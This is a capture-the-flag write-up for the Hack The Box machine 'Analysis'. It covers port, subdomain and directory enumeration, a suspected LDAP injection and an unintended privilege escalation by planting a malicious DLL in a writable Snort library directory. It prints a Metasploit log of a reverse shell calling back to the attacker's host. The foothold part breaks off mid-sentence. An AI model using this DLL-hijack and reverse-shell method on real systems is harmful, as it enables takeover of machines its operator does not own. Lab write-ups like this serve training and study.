Analysis
A Window Machine with an unintended privilege escalation
Enumeration
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ nmap -sC -sV -Pn 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-21 20:14 EST
Nmap scan report for analysis.htb (10.10.11.250)
Host is up (0.69s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 01:14:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -2s
| smb2-time:
| date: 2024-01-22T01:14:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.58 seconDNS + http sounds like a great combination for subdomain fuzzing.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ gobuster dns -d analysis.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: analysis.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2024/01/21 20:18:24 Starting gobuster in DNS enumeration mode
===============================================================
Found: internal.analysis.htb
Upon loading the site, we get a 403 error forbidden. Time to brute force the directories and file path.
──(kali㉿kali)-[~/Desktop/CTF/Boxes/Analysis]
└─$ ffuf -u http://internal.analysis.htb/users/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .php
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 98ms]
* FUZZ: list.php
[Status: 200, Size: 17, Words: 2, Lines: 1, Duration: 5ms]
* FUZZ: List.php
Visiting list.php, we get missing parameter and if we put a valid name we get back results!
Judging from this columns, it seems that the name parameter is susceptible to LDAP injection.
After a long while, I disc
Privilege Escalation (Unintended)
We can perform a DLL hijacking based on having write-permissions in the C:\Snort\lib\snort_dynamicpreprocessor directory.
According to the snort.conf located in C:\Snort\etc\ it defines the following
###################################################
# Step #4: Configure dynamic loaded libraries.
# For more information, see Snort Manual, Configuring Snort - Dynamic Modules
###################################################
# path to dynamic preprocessor libraries
dynamicpreprocessor directory C:\Snort\lib\snort_dynamicpreprocessor
# path to base preprocessor engine
dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
# path to dynamic rules libraries
# dynamicdetection directory C:\Snort\lib\snort_dynamicrules
We can tell that snort is restarting on intervals as the snort log is getting updated.
Therefore, we can drop our malicious DLL named sf_engine.dll into the C:\Snort\lib\snort_dynamicpreprocessor directory.
After uploading our malicious DLL to the directory and running snort with the config file listed above, we see that our DLL is actually laoded with no shell sadly.
Evil-WinRM* PS C:\Snort\bin> ./snort.exe -c C:\Snort\etc\snort.conf
snort.exe : Running in IDS mode
+ CategoryInfo : NotSpecified: (Running in IDS mode:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
--== Initializing Snort ==--Initializing Output Plugins!Initializing Preprocessors!Initializing Plug-ins!Parsing Rules file "C:\Snort\etc\snort.conf"PortVar 'HTTP_PORTS' defined : [ 80:81 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'SHELLCODE_PORTS' defined : [ 0:79 81:65535 ]PortVar 'ORACLE_PORTS' defined : [ 1024:65535 ]PortVar 'SSH_PORTS' defined : [ 22 ]PortVar 'FTP_PORTS' defined : [ 21 2100 3535 ]PortVar 'SIP_PORTS' defined : [ 5060:5061 5600 ]PortVar 'FILE_DATA_PORTS' defined : [ 80:81 110 143 311 383 591 593 901 1220 1414 1741 1830 2301 2381 2809 3037 3128 3702 4343 4848 5250 6988 7000:7001 7144:7145 7510 7777 7779 8000 8008 8014 8028 8080 8085 8088 8090 8118 8123 8180:8181 8243 8280 8300 8800 8888 8899 9000 9060 9080 9090:9091 9443 9999 11371 34443:34444 41080 50002 55555 ]PortVar 'GTP_PORTS' defined : [ 2123 2152 3386 ]Detection: Search-Method = AC-Full-Q Split Any/Any group = enabled Search-Method-Optimizations = enabled Maximum pattern length = 20Tagged Packet Limit: 256Loading dynamic engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll... doneLoading all dynamic preprocessor libs from C:\Snort\lib\snort_dynamicpreprocessor... Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dce2.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dnp3.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_dns.dll... done Loading dynamic preprocessor library C:\Snort\lib\snort_dynamicpreprocessor\sf_engine.dll...However after awhile, my metrepeter listener manages to catch a privileged shell, presumably from the Adminstrator running the batch script to restart snort.
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.11.250:65304) at 2024-01-21 19:59:11 -0500
meterpreter > shell
Process 15708 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
analysis\administrateur
Last updated